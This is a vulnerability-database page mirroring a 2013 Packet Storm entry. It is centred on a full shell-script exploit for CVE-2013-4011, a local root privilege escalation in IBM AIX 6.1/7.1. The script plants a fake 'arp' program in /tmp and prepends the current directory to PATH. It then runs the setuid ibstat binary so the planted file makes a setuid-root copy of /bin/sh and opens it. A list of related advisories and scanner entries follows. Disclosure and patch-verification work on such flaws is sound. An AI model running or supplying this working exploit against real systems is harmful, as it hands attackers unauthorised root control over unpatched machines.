Lucene search
Kristian HermansenPACKETSTORM:123369HistorySep 24, 2013 - 12:00 a.m.
IBM AIX 6.1 / 7.1 Local Root Privilege Escalation
2013-09-2400:00:00
Kristian Hermansen
packetstormsecurity.com
25
EPSS
0.001
Percentile
51.2%
`#!/bin/sh
# Exploit Title: IBM AIX 6.1 / 7.1 local root privilege escalation
# Date: 2013-09-24
# Exploit Author: Kristian Erik Hermansen <[email protected]>
# Vendor Homepage: http://www.ibm.com
# Software Link: http://www-03.ibm.com/systems/power/software/aix/about.html
# Version: IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02
# Tested on: IBM AIX 6.1
# CVE: CVE-2013-4011
echo '
mm mmmmm m m
## # # #
# # # ##
#mm# # m""m
# # mm#mm m" "m
'
echo "[*] AIX root privilege escalation"
echo "[*] Kristian Erik Hermansen"
echo "[*] https://linkedin.com/in/kristianhermansen"
echo "
+++++?????????????~.:,.:+???????????++++
+++++???????????+...:.,.,.=??????????+++
+++???????????~.,:~=~:::..,.~?????????++
+++???????????:,~==++++==~,,.?????????++
+++???????????,:=+++++++=~:,,~????????++
++++?????????+,~~=++++++=~:,,:????????++
+++++????????~,~===~=+~,,::,:+???????+++
++++++???????=~===++~~~+,,~::???????++++
++++++++?????=~=+++~~~:++=~:~+???+++++++
+++++++++????~~=+++~+=~===~~:+??++++++++
+++++++++?????~~=====~~==~:,:?++++++++++
++++++++++????+~==:::::=~:,+??++++++++++
++++++++++?????:~~=~~~~~::,??+++++++++++
++++++++++?????=~:~===~,,,????++++++++++
++++++++++???+:==~:,,.:~~..+??++++++++++
+++++++++++....==+===~~=~,...=?+++++++++
++++++++,........~=====..........+++++++
+++++................................++=
=+:....................................=
"
TMPDIR=/tmp
TAINT=${TMPDIR}/arp
RSHELL=${TMPDIR}/r00t-sh
cat > ${TAINT} <<-!
#!/bin/sh
cp /bin/sh ${RSHELL}
chown root ${RSHELL}
chmod 4555 ${RSHELL}
!
chmod 755 ${TAINT}
PATH=.:${PATH}
export PATH
cd ${TMPDIR}
/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null
if [ -e ${RSHELL} ]; then
echo "[+] Access granted. Don't be evil..."
${RSHELL}
else
echo "[-] Exploit failed. Try some 0day instead..."
fi
`
Related
attackerkb
attackerkb
CVE-2013-4011
2013-07-18 00:00:00
zdt
zdt
IBM AIX 6.1 / 7.1 - Local root Privilege Escalation Vulnerability
2013-09-24 00:00:00
ibstat $PATH Privilege Escalation Exploit
2014-04-04 00:00:00
cvelist
cvelist
CVE-2013-4011
2013-07-18 16:00:00
nessus
nessus
AIX 6.1 TL 8 : devices.common.IBM.ib.rte (U855978)
2013-08-10 00:00:00
AIX 7.1 TL 1 : infiniband (IV43756)
2013-07-19 00:00:00
AIX 6.1 TL 7 : infiniband (IV43827)
2013-07-19 00:00:00
exploitdb
exploitdb
ibstat $PATH - Local Privilege Escalation (Metasploit)
2014-04-04 00:00:00
IBM AIX 6.1/7.1 - Local Privilege Escalation
2013-09-24 00:00:00
metasploit
metasploit
ibstat $PATH Privilege Escalation
2014-02-27 21:56:49
seebug
seebug
IBM AIX 6.1 / 7.1 - Local Root Privilege Escalation
2014-07-01 00:00:00
aix
aix
prion
prion
Design/Logic Flaw
2013-07-18 16:51:00
exploitpack
exploitpack
IBM AIX 6.17.1 - Local Privilege Escalation
2013-09-24 00:00:00
nvd
nvd
CVE-2013-4011
2013-07-18 16:51:55
packetstorm
packetstorm
ibstat $PATH Privilege Escalation
2014-04-03 00:00:00
cve
cve
CVE-2013-4011
2013-07-18 16:51:55